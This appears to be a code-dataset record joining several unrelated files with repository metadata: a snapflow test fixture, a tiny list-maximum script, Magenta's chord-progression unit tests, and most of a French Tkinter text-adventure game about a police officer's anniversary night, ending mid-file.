1,2020-01-01 00:00:00,100
2,2020-02-01 00:00:00,100
2,2020-03-01 00:00:00,100
3,2020-01-01 00:00:00,300
3,2020-04-01 00:00:00,400
4,2020-01-01 00:00:00,100
4,2020-02-01 00:00:00,100
4,2020-03-01 00:00:00,50
5,2020-01-01 00:00:00,1000
""",
schema="bi.Transaction",
)
}
outputs = {
"default": """
customer_id,ltv
1,100
2,100
3,400
4,50
5,1000
"""
}
# from __future__ import annotations
# from dcp.storage.database.utils import get_tmp_sqlite_db_url
# from snapflow import Environment, graph, produce
# from snapflow.testing.utils import str_as_dataframe
# def test_ltv():
# from snapflow_bi import module as bi
# input_data = """
# customer_id,transacted_at,amount
# 1,2020-01-01 00:00:00,100
# 2,2020-02-01 00:00:00,100
# 2,2020-03-01 00:00:00,100
# 3,2020-01-01 00:00:00,300
# 3,2020-04-01 00:00:00,400
# 4,2020-01-01 00:00:00,100
# 4,2020-02-01 00:00:00,100
# 4,2020-03-01 00:00:00,50
# 5,2020-01-01 00:00:00,1000
# """
# env = Environment(metadata_storage=get_tmp_sqlite_db_url())
# txs = str_as_dataframe(env, input_data, nominal_schema=bi.schemas.Transaction)
# g = graph()
# df = g.create_node(
# "core.import_dataframe", params={"dataframe": txs, "schema": "bi.Transaction"}
# )
# ltv = g.create_node(bi.functions.transaction_ltv_model, upstream=df)
# blocks = produce(ltv, env=env, modules=[bi])
# output_df = blocks[0].as_dataframe()
# assert len(output_df) == 5
# assert set(output_df["customer_id"]) == set(i for i in range(1, 6))
| [
"kenvanharen@gmail.com"
] | kenvanharen@gmail.com |
2211df4948417b4a5f75d899942dee9fef97d367 | c2c49af335789153dd5181868348532ab0d24912 | /funkcijanaloga5.py | aa3c3ff9f465529357eee59dda361dc90bc2253d | [] | no_license | Elerimlmao/Python-2020 | 04ec5026798095cafcb56be5b218fbf37d793b96 | d33640aa47fca6bb305121436be7de4a5856309b | refs/heads/master | 2020-12-10T11:28:21.949957 | 2020-01-16T22:02:26 | 2020-01-16T22:02:26 | 233,581,475 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 88 | py | list1 = [1, 2, 3, 4, 5, 6, 7, 8, 9]
print("Največje število v listu je ", max(list1))
| [
"noreply@github.com"
] | noreply@github.com |
3274b9a98d47833d3d76ef809e94da84a57f07b0 | 9d30498c2dd82670adeb23d75cdf984e37c25510 | /magenta/music/chords_lib_test.py | f9f704ff9389301ef8351a1ac053d7a8bcc0a8b4 | [
"Apache-2.0"
] | permissive | WhiteSymmetry/magenta | 3f363ca183fa6c4b2def8c3a04dc4f3ced1b8d41 | 92bc70ba0bf8355c73fba9a7bcd25de50fc58862 | refs/heads/master | 2021-01-13T10:04:16.441375 | 2016-10-27T18:26:11 | 2016-10-27T18:26:11 | 72,141,979 | 1 | 0 | null | 2016-10-27T19:40:02 | 2016-10-27T19:40:00 | Python | UTF-8 | Python | false | false | 9,538 | py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for chords_lib."""
# internal imports
import tensorflow as tf
from magenta.music import chord_symbols_lib
from magenta.music import chords_lib
from magenta.music import constants
from magenta.music import melodies_lib
from magenta.music import sequences_lib
from magenta.music import testing_lib
NO_CHORD = constants.NO_CHORD
class ChordsLibTest(tf.test.TestCase):
  """Tests for ChordProgression and the chord-extraction helpers in chords_lib."""

  def setUp(self):
    # Fresh 60 qpm / 4 steps-per-quarter quantized sequence for every test.
    self.quantized_sequence = sequences_lib.QuantizedSequence()
    self.quantized_sequence.qpm = 60.0
    self.quantized_sequence.steps_per_quarter = 4

  def testTranspose(self):
    """Transposing shifts every chord root; NO_CHORD passes through unchanged."""
    # Transpose ChordProgression with basic triads.
    events = ['Cm', 'F', 'B-', 'E-']
    chords = chords_lib.ChordProgression(events)
    chords.transpose(transpose_amount=7)
    expected = ['Gm', 'C', 'F', 'B-']
    self.assertEqual(expected, list(chords))
    # Transpose ChordProgression with more complex chords.
    events = ['Esus2', 'B13', 'A7/B', 'F#dim']
    chords = chords_lib.ChordProgression(events)
    chords.transpose(transpose_amount=-2)
    expected = ['Dsus2', 'A13', 'G7/A', 'Edim']
    self.assertEqual(expected, list(chords))
    # Transpose ChordProgression containing NO_CHORD.
    events = ['C', 'B-', NO_CHORD, 'F', 'C']
    chords = chords_lib.ChordProgression(events)
    chords.transpose(transpose_amount=4)
    expected = ['E', 'D', NO_CHORD, 'A', 'E']
    self.assertEqual(expected, list(chords))

  def testTransposeUnknownChordSymbol(self):
    """An unparseable chord symbol makes transpose raise ChordSymbolException."""
    # Attempt to transpose ChordProgression with unknown chord symbol.
    events = ['Cm', 'G7', 'P#13', 'F']
    chords = chords_lib.ChordProgression(events)
    with self.assertRaises(chord_symbols_lib.ChordSymbolException):
      chords.transpose(transpose_amount=-4)

  def testFromQuantizedSequence(self):
    """Each step holds the most recent chord; leading steps get NO_CHORD."""
    testing_lib.add_quantized_chords_to_sequence(
        self.quantized_sequence,
        [('Am', 4), ('D7', 8), ('G13', 12), ('Csus', 14)])
    chords = chords_lib.ChordProgression()
    chords.from_quantized_sequence(
        self.quantized_sequence, start_step=0, end_step=16)
    expected = [NO_CHORD, NO_CHORD, NO_CHORD, NO_CHORD,
                'Am', 'Am', 'Am', 'Am', 'D7', 'D7', 'D7', 'D7',
                'G13', 'G13', 'Csus', 'Csus']
    self.assertEqual(expected, list(chords))

  def testFromQuantizedSequenceWithinSingleChord(self):
    """A window entirely inside one chord repeats that chord for every step."""
    testing_lib.add_quantized_chords_to_sequence(
        self.quantized_sequence, [('F', 0), ('Gm', 8)])
    chords = chords_lib.ChordProgression()
    chords.from_quantized_sequence(
        self.quantized_sequence, start_step=4, end_step=6)
    expected = ['F'] * 2
    self.assertEqual(expected, list(chords))

  def testFromQuantizedSequenceWithNoChords(self):
    """A sequence with no chord annotations yields NO_CHORD at every step."""
    chords = chords_lib.ChordProgression()
    chords.from_quantized_sequence(
        self.quantized_sequence, start_step=0, end_step=16)
    expected = [NO_CHORD] * 16
    self.assertEqual(expected, list(chords))

  def testFromQuantizedSequenceWithCoincidentChords(self):
    """Two chords on the same step raise CoincidentChordsException."""
    testing_lib.add_quantized_chords_to_sequence(
        self.quantized_sequence,
        [('Am', 4), ('D7', 8), ('G13', 12), ('Csus', 12)])
    chords = chords_lib.ChordProgression()
    with self.assertRaises(chords_lib.CoincidentChordsException):
      chords.from_quantized_sequence(
          self.quantized_sequence, start_step=0, end_step=16)

  def testExtractChords(self):
    """extract_chords returns one progression covering the whole sequence."""
    self.quantized_sequence.steps_per_quarter = 1
    testing_lib.add_quantized_chords_to_sequence(
        self.quantized_sequence, [('C', 2), ('G7', 6), ('F', 8)])
    self.quantized_sequence.total_steps = 10
    chord_progressions, _ = chords_lib.extract_chords(self.quantized_sequence)
    expected = [[NO_CHORD, NO_CHORD, 'C', 'C', 'C', 'C', 'G7', 'G7', 'F', 'F']]
    self.assertEqual(expected, [list(chords) for chords in chord_progressions])

  def testExtractChordsAllTranspositions(self):
    """all_transpositions=True yields the progression in all 12 keys."""
    self.quantized_sequence.steps_per_quarter = 1
    testing_lib.add_quantized_chords_to_sequence(
        self.quantized_sequence, [('C', 1)])
    self.quantized_sequence.total_steps = 2
    chord_progressions, _ = chords_lib.extract_chords(self.quantized_sequence,
                                                      all_transpositions=True)
    # Wrap zip in list(): on Python 3 zip() is an iterator, and comparing it
    # directly against a list of tuples would always fail.
    expected = list(zip([NO_CHORD] * 12, ['G-', 'G', 'A-', 'A', 'B-', 'B',
                                          'C', 'D-', 'D', 'E-', 'E', 'F']))
    self.assertEqual(expected, [tuple(chords) for chords in chord_progressions])

  def testExtractChordsForMelodies(self):
    """One chord progression is extracted per melody, aligned to its steps."""
    self.quantized_sequence.steps_per_quarter = 1
    testing_lib.add_quantized_track_to_sequence(
        self.quantized_sequence, 0,
        [(12, 100, 2, 4), (11, 1, 6, 11)])
    testing_lib.add_quantized_track_to_sequence(
        self.quantized_sequence, 1,
        [(12, 127, 2, 4), (14, 50, 6, 8),
         (50, 100, 33, 37), (52, 100, 34, 37)])
    testing_lib.add_quantized_chords_to_sequence(
        self.quantized_sequence,
        [('C', 2), ('G7', 6), ('Cmaj7', 33)])
    melodies, _ = melodies_lib.extract_melodies(
        self.quantized_sequence, min_bars=1, gap_bars=2, min_unique_pitches=2,
        ignore_polyphonic_notes=True)
    chord_progressions, _ = chords_lib.extract_chords_for_melodies(
        self.quantized_sequence, melodies)
    expected = [[NO_CHORD, NO_CHORD, 'C', 'C', 'C', 'C',
                 'G7', 'G7', 'G7', 'G7', 'G7'],
                [NO_CHORD, NO_CHORD, 'C', 'C', 'C', 'C', 'G7', 'G7'],
                ['G7', 'Cmaj7', 'Cmaj7', 'Cmaj7', 'Cmaj7']]
    self.assertEqual(expected, [list(chords) for chords in chord_progressions])

  def testExtractChordsForMelodiesCoincidentChords(self):
    """A melody overlapping coincident chords yields None plus a stat count."""
    self.quantized_sequence.steps_per_quarter = 1
    testing_lib.add_quantized_track_to_sequence(
        self.quantized_sequence, 0,
        [(12, 100, 2, 4), (11, 1, 6, 11)])
    testing_lib.add_quantized_track_to_sequence(
        self.quantized_sequence, 1,
        [(12, 127, 2, 4), (14, 50, 6, 8),
         (50, 100, 33, 37), (52, 100, 34, 37)])
    testing_lib.add_quantized_chords_to_sequence(
        self.quantized_sequence,
        [('C', 2), ('G7', 6), ('E13', 8), ('Cmaj7', 8)])
    melodies, _ = melodies_lib.extract_melodies(
        self.quantized_sequence, min_bars=1, gap_bars=2, min_unique_pitches=2,
        ignore_polyphonic_notes=True)
    chord_progressions, stats = chords_lib.extract_chords_for_melodies(
        self.quantized_sequence, melodies)
    expected = [[NO_CHORD, NO_CHORD, 'C', 'C', 'C', 'C', 'G7', 'G7'],
                ['Cmaj7', 'Cmaj7', 'Cmaj7', 'Cmaj7', 'Cmaj7']]
    stats_dict = dict([(stat.name, stat) for stat in stats])
    self.assertIsNone(chord_progressions[0])
    self.assertEqual(expected,
                     [list(chords) for chords in chord_progressions[1:]])
    self.assertEqual(stats_dict['coincident_chords'].count, 1)

  def testToSequence(self):
    """to_sequence emits one CHORD_SYMBOL annotation per chord change."""
    chords = chords_lib.ChordProgression(
        [NO_CHORD, 'C7', 'C7', 'C7', 'C7', 'Am7b5', 'F6', 'F6', NO_CHORD])
    sequence = chords.to_sequence(sequence_start_time=2, qpm=60.0)
    self.assertProtoEquals(
        'ticks_per_quarter: 220 '
        'tempos < qpm: 60.0 > '
        'text_annotations < '
        '  text: "C7" time: 2.25 annotation_type: CHORD_SYMBOL '
        '> '
        'text_annotations < '
        '  text: "Am7b5" time: 3.25 annotation_type: CHORD_SYMBOL '
        '> '
        'text_annotations < '
        '  text: "F6" time: 3.5 annotation_type: CHORD_SYMBOL '
        '> '
        'text_annotations < '
        '  text: "N.C." time: 4.0 annotation_type: CHORD_SYMBOL '
        '> ',
        sequence)
class MajorMinorEncoderDecoderTest(tf.test.TestCase):
  """Tests for MajorMinorEncoderDecoder's chord-figure <-> index mapping.

  Uses ``assertEqual`` rather than the deprecated ``assertEquals`` alias
  (removed in Python 3.12).
  """

  def setUp(self):
    self.encoder_decoder = chords_lib.MajorMinorEncoderDecoder()

  def testEncodeNoChord(self):
    # Index 0 is reserved for NO_CHORD.
    index = self.encoder_decoder.encode_chord(NO_CHORD)
    self.assertEqual(0, index)

  def testEncodeChord(self):
    """Chords map by root and quality; extensions collapse to major/minor."""
    # major triad
    index = self.encoder_decoder.encode_chord('C')
    self.assertEqual(1, index)
    # minor triad
    index = self.encoder_decoder.encode_chord('Cm')
    self.assertEqual(13, index)
    # dominant 7th
    index = self.encoder_decoder.encode_chord('F7')
    self.assertEqual(6, index)
    # minor 9th
    index = self.encoder_decoder.encode_chord('A-m9')
    self.assertEqual(21, index)

  def testEncodeThirdlessChord(self):
    """Chords with no third (sus, power) cannot be classified major/minor."""
    # suspended chord
    with self.assertRaises(chords_lib.ChordEncodingException):
      self.encoder_decoder.encode_chord('Gsus4')
    # power chord
    with self.assertRaises(chords_lib.ChordEncodingException):
      self.encoder_decoder.encode_chord('B-5')

  def testDecodeNoChord(self):
    figure = self.encoder_decoder.decode_chord(0)
    self.assertEqual(NO_CHORD, figure)

  def testDecodeChord(self):
    # major chord
    figure = self.encoder_decoder.decode_chord(3)
    self.assertEqual('D', figure)
    # minor chord
    figure = self.encoder_decoder.decode_chord(17)
    self.assertEqual('Em', figure)
# Run the test suite when this module is executed directly.
if __name__ == '__main__':
  tf.test.main()
| [
"noreply@github.com"
] | noreply@github.com |
6a11fe9adff857a928b0588d1bfac4ecdd95741e | 9f83ef9c27c612cd210bc1abde7c91d2b0e8a552 | /A Night Game.py | fc1d744ef64ce2b52fff21812721feebb66f6298 | [] | no_license | Phoenix99Ash/Fichiers | 2d2d283f79684ebacb5a206fafe24c9cd1d130dd | e0d9adbb7ee13d1e4607242505b9e1206b3f1008 | refs/heads/master | 2021-05-20T23:13:39.892326 | 2020-04-02T13:37:47 | 2020-04-02T13:37:47 | 252,448,430 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28,486 | py | from tkinter import*
from tkinter.messagebox import *
from tkinter.filedialog import *
# Open the main window.
menu = Tk()
menu.title('A night game - fenêtre principale')
# Module-level game state read back by fin() at the end of the game.
# NOTE(review): several handlers below assign these names without a `global`
# declaration, so those assignments only create locals — verify intent.
a = 0
b = 0
nombredemort = 0
voiture = "propre"
combat = "gagné"
qui = "un mari honnête"
rob = "blanche et courte"
# Clear the window and open the welcome screen.
def entrer():
    """Reset the main window and display the game's welcome screen."""
    for w in menu.winfo_children():
        w.destroy()
    menu.pack_propagate(0)  # keep the window from resizing to its contents
    lab = Label(menu, fg='black', text= "-Synopsis-", font=("arial", 10, "bold italic"))
    lab.pack()
    text = Label(menu,width=10,height=5, fg='red', text= "Bienvenue", font=("arial", 50, "bold italic"))
    text.pack()
    contin = Label(menu,width = 50, height = 5, text = "appuyez sur la flèche droite pour continuer", font=("arial",10,"bold italic"))
    contin.pack(side = BOTTOM)
    # Route key presses on the welcome label to the main key handler.
    text.focus_set()
    text.bind("<Key>", clavier)
# Definition of the key bindings.
def clavier(event):
    """Dispatch key presses on the welcome screen.

    Return starts the game, Down is refused, Right advances the story and
    Left replays the intro after a death.

    NOTE(review): the two identical ``touche == "Right"`` tests both fire on
    a single Right press, so the synopsis popup and the garage scene run in
    sequence — confirm this is intended and not a copy/paste slip.
    """
    touche = event.keysym
    if touche == "Return":
        commencer()
    if touche == "Down":
        interdiction()
    if touche == "Right" :
        for w in menu.winfo_children():
            w.destroy()
        menu.pack_propagate(0)
        lab = Label(menu, fg='black', text = "-Synopsis-", font=("arial", 10 , "bold italic"))
        lab.pack()
        # NOTE(review): this Label is created but never packed.
        text = Label(menu,width=10,height=5, fg='red', text= "Bienvenue", font=("arial", 50, "bold italic"))
        contin = Label(menu,width = 50, height = 5, text = "appuyez sur la flèche droite pour continuer", font=("arial",10,"bold italic"))
        contin.pack(side = BOTTOM)
        showwarning('Explication',"Il est 21h du soir au moment où Sébastian, agent de police..et gardien de la paix avant tout, rentre chez lui. C'est l'occasion pour lui de fêter l'anniversaire de son mariage avec sa femme, Sophia. Il habite dans une villa, très calme aux alentours des voisins.")
    if touche == "Right" :
        for w in menu.winfo_children():
            w.destroy()
        menu.pack_propagate(0)
        lab = Label(menu, fg='black', text = "-Vous êtes devant votre garage-", font=("arial", 10 , "bold italic"))
        lab.pack()
        showinfo("Arrivé chez lui","Sébastian gare sa voiture devant son garage. Cependant, en sortant de sa voiture, il constate qu'il a oublié le cadeau ! ")
        Button(menu,width = 50, height = 5, text ="vous décidez d'aller faire les boutiques",font=(1000000), command=shopping).pack(side=LEFT, padx=5, pady=5)
        Button(menu,width = 50, height =5, text ="vous décidez d'entrer chez vous quand même",font=(1000000),command=maison).pack(side=RIGHT, padx=5, pady=5)
    if touche == "Left" :
        for w in menu.winfo_children():
            w.destroy()
        menu.pack_propagate(0)
        lab = Label(menu, fg='black', text = "-Synopsis-", font=("arial", 10 , "bold italic"))
        lab.pack()
        showinfo('Vous',"Wow..Vous êtes mauvais..Il est mort à cause de vous. Nous ne sommes pas tous né parfait, il faut apprendre du passé")
        showwarning('Explication',"Il est 21h du soir au moment où Sébastian, agent de police..et gardien de la paix avant tout, rentre chez lui. C'est l'occasion pour lui de fêter l'anniversaire de son mariage avec sa femme, Sophia. Il habite dans une villa, très calme aux alentours des voisins.")
        lab = Label(menu, fg='black', text = "-Vous êtes devant votre garage-", font=("arial", 10 , "bold italic"))
        lab.pack()
        showinfo("L'arrivée chez lui","Sébastian gare sa voiture devant son garage. Cependant, en sortant de sa voiture, il constate qu'il a oublié le cadeau ! ")
        Button(menu,width = 70, height = 5, text ="Vous décidez d'aller lentement dans la maison, en faisant énormément de bruit",font=(1000000), command=rentrerl).pack(side=TOP, padx=5, pady=5)
        Button(menu,width = 70, height =5, text ="Vous décidez d'entrer chez vous après quelques minutes d'attente",font=(1000000),command=rentrerf).pack(side=BOTTOM, padx=5, pady=5)
def rentrerl():
    """Branch: enter the house slowly and noisily (second playthrough path)."""
    for w in menu.winfo_children():
        w.destroy()
    menu.pack_propagate(0)
    lab = Label(menu, fg='black', text = "-Vous êtes dans votre maison-", font=("arial", 10 , "bold italic"))
    lab.pack()
    Button(menu,width = 50, height = 5, text ="Vous décidez d'aller faire les boutiques",font=(1000000), command=shopping).pack(side=LEFT, padx=5, pady=5)
    Button(menu,width = 50, height =5, text ="Vous décidez d'entrer chez vous quand même",font=(1000000),command=maison).pack(side=RIGHT, padx=5, pady=5)
    showinfo('Entrée lente',"Sebastian entre lentement dans la maison")
    showinfo('Entrée lente',"Il remarque la présence d'homme cagoulé dans leur jardin, mais ils fuient en voyant Sebastian")
    showinfo('Entrée lente',"Il entre en gardant son calme et soudain « Coucou chéri ! ». Cette voix provenait de la cuisine. Sophia se dépêche de voir Sébastian.")
    showinfo('Entrée lente',"<<Tu as apporté mon cadeau ?>>")
    showinfo('Entrée lente',"Elle a toujours eu les yeux en face des trous..Parsemant le portefeuille de Sebastian, il aimait ça chez elle.")
    # NOTE(review): prepenigme2() offers the lie/truth choice, then Enigme2()
    # opens unconditionally right after — confirm both calls are intended.
    prepenigme2()
    Enigme2()
def rentrerf():
    """Branch: wait a few minutes before entering the house."""
    for w in menu.winfo_children():
        w.destroy()
    menu.pack_propagate(0)
    lab = Label(menu, fg='black', text = "-Vous êtes dans votre maison-", font=("arial", 10 , "bold italic"))
    lab.pack()
    showinfo('Entrée attente',"Sébastian entre lentement dans la maison")
    showinfo('Entrée attente',"Il remarque la présence d'homme cagoulé dans leur maison, mais ils fuient en voyant Sebastian")
    showinfo('Entrée attente',"Il entre en gardant son calme et soudain « Coucou chéri ! ». Cette voix provenait de la cuisine. Sophia se dépêche de voir Sébastian.")
    showinfo('Entrée attente',"Tu as apporté mon cadeau ?")
    showinfo('Entrée attente',"Elle a toujours eu les yeux en face des trous..Parsemant le portefeuille de Sébastian, il aimait ça chez elle")
    prepenigme2()
def prepenigme2():
    """Offer the lie/truth choice about the forgotten present."""
    for w in menu.winfo_children():
        w.destroy()
    menu.pack_propagate(0)
    lab = Label(menu, fg='black', text = "-Vous êtes dans votre maison-", font=("arial", 10 , "bold italic"))
    lab.pack()
    Button(menu,width = 50, height = 5, text ="Vous décidez de lui mentir",font=(1000000), command=Enigme2).pack(side=LEFT, padx=5, pady=5)
    Button(menu,width = 50, height =5, text ="Vous décidez de lui dire la vérité",font=(1000000),command=verite).pack(side=RIGHT, padx=5, pady=5)
def Enigme2():
    """Open riddle 2 in its own window; both answers lead onward."""
    showwarning('Enigme 2',"Tentez de convaincre votre femme en résolvant cette énigme !")
    enigme2 = Tk()
    enigme2.title('Enigme 2')
    frame = Frame(enigme2, bg="ivory", borderwidth=2)
    frame.pack(side=TOP, padx=5, pady=5)
    Label(frame,width = 40, height = 5, fg = 'red', text='Peut-on remonter dans le temps ?',bg="ivory", font =("arial",30, "bold italic")).pack(padx=5, pady=5)
    Button(enigme2,width = 10, height = 5, text ='Oui',font=(1000000), command=reussi2a).pack(side=LEFT, padx=5, pady=5)
    Button(enigme2,width = 10, height =5, text ='Non',font=(1000000),command=reussi2b).pack(side=RIGHT, padx=5, pady=5)
def reussi2a():
    """Handle the "Oui" answer to riddle 2, then continue on the lie path.

    Marks the player as a liar so that fin() reports it in the end summary.
    """
    showwarning('Woohoo !Tu gères !',"Alors pourquoi tenter d'avancer ?")
    showwarning('Woohoo !',"Peut-être que s'arrêter serait le meilleur moyen de progresser ?")
    showerror('..',"....")
    # `global` is required: without it this assignment created a local that
    # was discarded, and fin() always printed the default value of `qui`.
    global qui
    qui = "un menteur"
    continuationm()
def reussi2b():
    """Handle the "Non" answer to riddle 2, then continue on the lie path."""
    showerror('Woohoo! Tu gères !',"Exactement, alors arrête de continuer ce jeu stupide !")
    showerror('...',"...")
    continuationm()
def verite():
    """Truth branch: go straight to the honest conversation."""
    continuation()
def continuationm():
    """Play the dialogue where Sébastian lies about the present, then pick a dress."""
    showinfo('Mensonge',"Sébastian tente de s'expliquer avec merveille")
    showinfo('Mensonge',"<<Je suis désolé, j'aurais aimé t'en offrir mais mon chef a changé de plan ce qui m'a retardé mon temps libre.>>")
    showinfo('Mensonge',"<<Ce n'est pas grave, on le fera sans, dit-elle avec une pointe d'amertume.>>, Rétorqua-t-elle.")
    robe()
def continuation():
    """Play the dialogue where Sébastian tells the truth, then pick a dress."""
    showinfo('Vérité',"Sébastian tente de s'expliquer avec désolemant")
    showinfo('Vérité',"<<Je suis navré, j'ai totalement oublié dû au travail.>>")
    showinfo('Vérité',"<<Je peux tout à fait comprendre au vu de ta fonction. Tu fais de ton mieux, en la réconfortant>>, Rétorqua-t-elle.")
    robe()
def robe():
    """Dress-choice scene: offer the two dresses as buttons."""
    for w in menu.winfo_children():
        w.destroy()
    menu.pack_propagate(0)
    lab = Label(menu, fg='black', text = "-Vous êtes à l'étage de votre maison-", font=("arial", 10 , "bold italic"))
    lab.pack()
    showinfo('Vêtement',"Sébastian monte à l’étage pour pouvoir changer son vestimentaire dans la chambre.")
    showinfo('Vêtement',"En ouvrant le placard, il choisit un costard de couleur noir accompagné d’un noeud de papillon.")
    showinfo('Vêtement',"Sophia, devant la porte de la chambre, demande à son mari,")
    showinfo('Vêtement',"<<Dis-moi, parmi ces deux robes, laquelle me conviendrait ?>>")
    showinfo('Vêtement',"Il ouvre la porte et découvre deux magnifiques robes.")
    showinfo('Vêtement',"La première est une robe longue et rouge, accompagnée de bretelles dorées. La deuxième est une robe courte de couleur blanche, brodée de rose")
    Button(menu,width = 50, height = 5, text ="Vous choisissez la 1ère robe",font=(1000000), command=robe1).pack(side=LEFT, padx=5, pady=5)
    Button(menu,width = 50, height =5, text ="Vous choisissez la 2nde robe",font=(1000000),command=robe2).pack(side=RIGHT, padx=5, pady=5)
def robe1():
    """First dress chosen: record the red dress in the game state, then dinner."""
    # `global` is required: without it the assignment only shadowed the
    # module-level `rob` and the choice was forgotten outside this handler.
    global rob
    rob = "rouge et longue"
    print("<<Je préfère la robe", rob , "elle te correspond bien. Je suis sûr que tu seras mignonne en la portant>>")
    showinfo('Robe',"en répondant avec un joli sourire.")
    showinfo('Robe',"Elle se hâte d’enfiler cette magnifique robe.")
    showinfo('Robe',"Quelques minutes plus tard, tous les deux se rendent à la table à manger. En entrée, il y a du saumon, des huîtres avec du citron.")
    showinfo('Robe',"De plus, une sauce au trois poivres accompagne un magnifique rôti comme plat chaud. Enfin, un gâteau à un étage.Sophia demande à Sébastian,")
    showinfo("Boisson","Veux-tu un verre de vin ?")
    boisson()
def robe2():
    """Second dress chosen: keep the default white dress, then dinner."""
    # Uses the module-level `rob` default ("blanche et courte").
    print("<<Je préfère la robe", rob , "elle te correspond bien. Je suis sûr que tu seras mignonne en la portant>>")
    showinfo('Robe',"en répondant avec un joli sourire.")
    showinfo('Robe',"Elle se hâte d’enfiler cette magnifique robe.")
    showinfo('Robe',"Quelques minutes plus tard, tous les deux se rendent à la table à manger. En entrée, il y a du saumon, des huîtres avec du citron.")
    showinfo('Robe',"De plus, une sauce au trois poivres accompagne un magnifique rôti comme plat chaud. Enfin, un gâteau à un étage.Sophia demande à Sébastian,")
    showinfo("Boisson","Veux-tu un verre de vin ?")
    boisson()
def boisson():
    """Drink-choice scene: accept the wine or refuse it."""
    for w in menu.winfo_children():
        w.destroy()
    menu.pack_propagate(0)
    lab = Label(menu, fg='black', text = "-Vous êtes à l'étage de votre maison-", font=("arial", 10 , "bold italic"))
    lab.pack()
    Button(menu,width = 50, height = 5, text ="Vous acceptez son choix",font=(1000000), command=vin).pack(side=LEFT, padx=5, pady=5)
    Button(menu,width = 50, height =5, text ="Vous refusez son choix",font=(1000000),command=jusdefruit).pack(side=RIGHT, padx=5, pady=5)
def vin():
    """Wine ending: Sophia is poisoned and Sébastian blacks out (game over)."""
    for w in menu.winfo_children():
        w.destroy()
    menu.pack_propagate(0)
    lab = Label(menu, fg='black', text = "-Vous ne savez pas où vous êtes-", font=("arial", 10 , "bold italic"))
    lab.pack()
    showinfo('Vin',"Sébastian répondit, enthousiaste :")
    showinfo('Vin',"<<Avec plaisir>>")
    showinfo('Vin',"Sébastian se rend dans le garage afin de le récupérer. Une fois de retour, il retire le bouchon et verse le vin dans un verre puis elle le boit.")
    showinfo('Vin',"Sébastian s'en sert aussi un verre, qu'il bu goulûment")
    showinfo('Vin',"Soudain, Sophia ne sent pas bien. Quelques secondes plus tard Elle tousse de plus en plus fort et tombe par terre.")
    showinfo('Vin',"<<Qu'y a-t-il ?!>> Demanda rapidement Sébastian")
    showinfo('Vin',"Je...M'étouffe..!")
    showinfo('Vin',"Sébastian tente de la réveiller. Il prend son pouls mais aucun signe….")
    showinfo('Vin',"Sébastian analyse le verre de sa femme : Il y avait des résidus d'une poudre blanche à l'intérieur")
    showinfo('Vin',"Les cambrioleurs qu'il avait vu lorsqu'il est entré devaient être les personnes qui avaient empoisonné le verre !")
    showinfo('Vin',"Sébastian pleure la mort de sa femme, et commence à s'asseoir de nouveau à table, buvant le vin directement à la bouteille pour faire paser son chagrin.")
    showerror('Vin',"Sébastian tombe dans les pommes, il fait un coma éthylique.")
    showerror('Vin',"GAME OVER ?")
    for w in menu.winfo_children():
        w.destroy()
    menu.pack_propagate(0)
    text = Label(menu,width=10,height=5, fg='red', text= "QUITTEZ.", font=("arial", 50, "bold italic"))
    text.pack()
    # Install the hidden button that triggers the real ending.
    bientotlafin()
def jusdefruit():
    """Juice ending: Sébastian is poisoned instead (game over)."""
    showinfo('Jus',"Il refuse explicitement.")
    showinfo('Jus',"<<Hum..Pas encore.>>")
    showinfo('Jus',"<<Aller, juste un verre !>> Implora-t-elle.")
    showinfo('Jus',"Je veux bien mais si mon chef a besoin de moi sur le terrain, je serai dans l’obligation de m’y rendre au plus vite en voiture.")
    showinfo('Jus',"<<Bon d'accord.>>, dit-elle d'un ton déçu.")
    showinfo('Jus',"<<Pourquoi pas un jus de fruit ?>>")
    showinfo('Jus',"<<ça me va.>>")
    showinfo('Jus',"Sébastian se rend à la cuisine pour récupérer un jus de fruit dans le frigo. Il verse dans deux verres et donne un à sa femme.")
    showinfo('Jus',"Ils boivent tout les deux tranquillement dans leur verre respectif.")
    showinfo('Jus',"Il semblerait cependant que celui de Sébastian soit empoisonné !")
    showinfo('Jus',"Il commence à suffoquer au sol, il voit d'ailleurs à ce moment là sa femme qui tente de lui venir en aide !")
    showinfo('Jus',"Mais les cambrioleurs qui s'étaient enfui dès qu'ils avaient entre-aperçuent Sébastian revinrent, et tuèrent sa femme d'un coup de dague de le coeur !")
    showinfo('Jus',"Riant à haute voix, se moquant de Sébastian, les cambrioleurs vinrent rapidement commencer à éttoufer Sébastian à l'air de leur main !")
    showerror('Jus',"GAME OVER ?")
    for w in menu.winfo_children():
        w.destroy()
    menu.pack_propagate(0)
    text = Label(menu,width=10,height=5, fg='red', text= "QUITTEZ.", font=("arial", 50, "bold italic"))
    text.pack()
    # Install the hidden button that triggers the real ending.
    bientotlafin()
def shopping() :
    """Shopping branch: drive to the mall and face riddle 1."""
    for w in menu.winfo_children():
        w.destroy()
    menu.pack_propagate(0)  # keep the window from resizing to its contents
    lab = Label(menu, fg='black', text= "-Vous êtes sur la route-", font=("arial", 10, "bold italic"))
    lab.pack()
    showinfo('Shopping',"Vous décidez d'aller faire du shopping")
    showinfo('Shopping',"Sébastian se dépêche en prenant sa voiture en direction du centre commercial.")
    showwarning('Enigme',"Résolvez cette énigme pour ne pas arriver en retard à l'anniversaire !")
    # The riddle opens in its own top-level window.
    Enigme1 = Tk()
    Enigme1.title("Enigme 1")
    frame = Frame(Enigme1, bg="ivory", borderwidth=2)
    frame.pack(side=TOP, padx=5, pady=5)
    Label(frame,width = 25, height = 5, fg = 'red', text='Quelle est la lettre qui suit "z" ? ',bg="ivory", font =("arial",30, "bold italic")).pack(padx=5, pady=5)
    Button(Enigme1,width = 10, height = 5, text ='r',font=(1000000), command=defaite1).pack(side=LEFT, padx=5, pady=5)
    Button(Enigme1,width = 10, height =5, text ='a',font=(1000000),command=reussi1).pack(side=RIGHT, padx=5, pady=5)
    Button(Enigme1, width = 10, height =5, text = '1', font =(100000), command=defaite1).pack(padx=5, pady=5)
def reussi1():
    """Riddle 1 solved: rush home with the present (the car gets dirty)."""
